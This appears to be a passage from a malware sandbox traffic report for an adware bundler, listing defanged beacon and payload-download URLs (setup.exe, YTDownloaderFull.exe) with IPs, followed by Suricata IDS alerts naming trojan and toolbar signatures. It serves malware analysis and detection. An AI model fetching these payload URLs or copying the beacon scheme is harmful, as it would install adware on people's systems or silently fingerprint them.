ime=1434694627&procruntime=12&rnd=1434694639
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1434694627&lifetime=0&silent=1&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639
hxxp://rep.shopper-pro.com/app/ping.ashx?action=uidCreated&userid={FE7C500E-E7F2-4E77-A4D1-6A1E9A62EBFF}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&v=1.0.8654.1137&url=&title=&pingtext=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://logs.neomaxsrv.com/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627	69.16.175.10
hxxp://dl.ourinputinfonet.com/web/gf/all/setup.exe	69.16.175.10
hxxp://dl.ourinputinfonet.com/spdbt/shoppy/snsch7.exe	69.16.175.10
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=sf5RTiQoQne3OkiMUUEbQe0sWH6y5VWzKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncBgCRXRXrO/v1QHs3X92ilEqjHjRwH0s7BD4NsK07Wi5s IILilpWF1YyXxSCjiPqaE3hyBhQt7Tnc5tZJ2EDLeSCPTBz14MxScKZA7dr10wk5dpEt5PL7oIA44xPc2qoovygOtU/9wo6pqgVuVy 5fXvfdY6g9CW42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1UqQUYbWgydxEpd12oOs1OnGq6YMAFxWUA=	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://ewp96u3qp-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://stats.neomaxsrv.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1434694627&lifetime=0&silent=1&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639	54.231.2.52
hxxp://stats.neomaxsrv.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1434694627&procruntime=5&rnd=1434694632	54.231.2.52
hxxp://stats.neomaxsrv.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_68&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1434694627&procruntime=5&rnd=1434694632	54.231.2.52
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=lOCrbsNL2zWYW6sXTpZ7/McrIdqQqjphDjQZdK 7JLk2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwYGplaxtKDMMapRW8qn0uD1ce90znhXYsIjgb6v7cXpPsHbyM38hHidWLqEwh0zCuoJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=xY8ohDYpM j7QFMK1iR6lt98eXkGB3DtoOZ8Vy4PwRBA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98Lhu0b45kiT/q965piIXltRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyX4qqsNyMBXLhKjg3QPK9Rah4lxHBW/CZ	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1434694627	54.231.16.28
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KSz5qzb2KgIHmSWm27gjw8crIdqQqjphrPxVQ4X6tMY2fVsQFDtppP2TEkHeJNDU3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgd/XCztdoPbJFiFlIaXxqEcmxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciwyyzTF2Y0WVu	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1434694627	54.231.16.28
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=b1dRW7RxYKfwl4DCqEaRhERqjDeyua2nnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wYZf1LqK7dF9Tc/ TiC/QQMa8vvz4viJlsTo2d4WqtMZ4u3oGHN86wPfE/ OuNytPyvTet81FAwHjgb6v7cXpPth71QQSR2eRlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGn9Ml1CWbMzqGGIJKr1apPDjX11Os5aVVaMSW7JRyrSLU=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=hpY1rXLYst7pvV2oKfdHnIYfPwUxGC9unvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wYZf1LqK7dF9Tc/ TiC/QQMa8vvz4viJlsTo2d4WqtMZ54ebh5tiGXeMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1434694634	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1434694637	54.231.16.28
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=AZwPyJy3TZgLjT49fHfOTHglgR8bHqG4jvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0LqzgdfeQRNwvtN90js0 pge/oATxIUcsgQ w5ete8oeBwFl4bl7YkTc3OjYd0CRAC1t07hyorM4nAaDrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjLmd/WSpl/Ldm6Zb/UxpNXwyqtXATFrgFGlrfSyqciP8=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=uWabAt9SLczfh1h59JTgdOTAfgQRWUFymkbcHfsclGVA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98YXcJcN2x8HBWOvghCBTr/XvKbjUyzCCcFAL52sIXt4UiHBOm9AZr4oOYK6Renk/bgpsddDctmUeRBCMzfKGIWK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGS5zOIEyMDZuzsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVSpBRhtaDJ3ESl3Xag6zU6carpgwAXFZQA==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=eISsn0A7mAZMV62Gsz5XORmdHjppjZglnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wYZf1LqK7dF9Tc/ TiC/QQMa8vvz4viJlsTo2d4WqtMZ4nJwzEzT2yGx2KlVs8m8LqSlVGmgAnwDgZiB55ZFi60AHhdHa2TStS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjnTPUjj0Gocezo1kUPgivlF3/uS0BoaQ4k=	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1434694635	54.231.16.28
hxxp://qwyt2g70w-zxis6jz8.netdna-ssl.com/t.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=lOCrbsNL2zX5PxLbQh95wAXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rmTRcHKuVeTpZhKEBix7LJLFAL52sIXt4UXMdeVS0aoyhhkHgG1sdzXjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVSpBRhtaDJ3ESl3Xag6zU6carpgwAXFZQA==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KSz5qzb2KgILjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtT1NzI6eOpBwJuuc9uz6WdZs IILilpWF2V9PoQYImhoi5ITADj fT8LkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOdM9SOPQahx7OjWRQ CK UXf 5LQGhpDiQ==	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1434694635	54.231.16.28
hxxp://stats.neomaxsrv.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1434694627&lifetime=0&silent=1&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639	54.231.2.52
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1434694633	54.231.16.28
hxxp://stats.neomaxsrv.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_68&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=11&rnd=1434694638	54.231.2.52
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1434694637	54.231.16.28
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KC46TpkJIZx8NmhuTfZHgICqKDcj8uMnI0kPktKhKydXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjIhYYlC 73rvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMZNlL2ErUKw/Z7qdg7Xwz6Av llJTn41WNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVKkFGG1oMncRKXddqDrNTpxqumDABcVlA	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1434694634	54.231.16.28
hxxp://errors.neomaxsrv.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1434694637	54.231.16.28
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frhIuO5K2YaHLiQXbR6IImT 8SQ57JL3/ kTOIhAKoUW5pYiq/cO8X1ri5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoW16pnq3EtsLKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PDge2J5meb7mV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBdtvXdjZich/LuFImjqVvnpLzlRQoWH97Q=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=043Mckb8Lng3732dIkiRjrc6SIxRQRtBH/3nQdMFfOAoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwGAJFdFes7 /wsHnwsxHHbeG0picB3eoeudGrX9r3ODqz4gguKWlYXZ7CQlHfCCFoKuJL2x o5erVet 40raSRZqUKOZJxNkS1CaPMmNRTpbGzesqwfp41URL4UUnJT9aLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOdM9SOPQahx7OjWRQ CK UXf 5LQGhpDiQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=PcwT4QFtuPDEA05CBT6a0YCqKDcj8uMnjtIF7JX52xdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjMLdX5s 5V6ZWOvghCBTr/TdVMo67fxO0s IILilpWF0qsPhrJ4rL5/EiQPnfm1ghw0gtAu69/jUklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKC0927cjGq3hLh0VTpm3sSDcVTtmyTzBnyucPTMPOBI=	198.232.124.192
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1434694635	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://logs.neomaxsrv.com/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627	69.16.175.10
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1434694633	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1434694637	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1434694635	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1434694636	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1434694633	54.231.16.28
hxxp://errors.neomaxsrv.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632	54.231.16.28
hxxp://errors.neomaxsrv.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1434694633	54.231.16.28
hxxp://stats.neomaxsrv.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639	54.231.2.52
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=yhrBLBbZM9ULjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtTEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615E5i0QfIFBKL8/yZ12nOcB0IiX5OMxcz31 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBdtvXdjZich/LuFImjqVvnpLzlRQoWH97Q=	198.232.124.192
rep.ytdownloader.com	54.197.238.106

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Executable served from Amazon S3
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
SURICATA STREAM SHUTDOWN RST invalid ack
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
SURICATA STREAM FIN out of window

Traffic

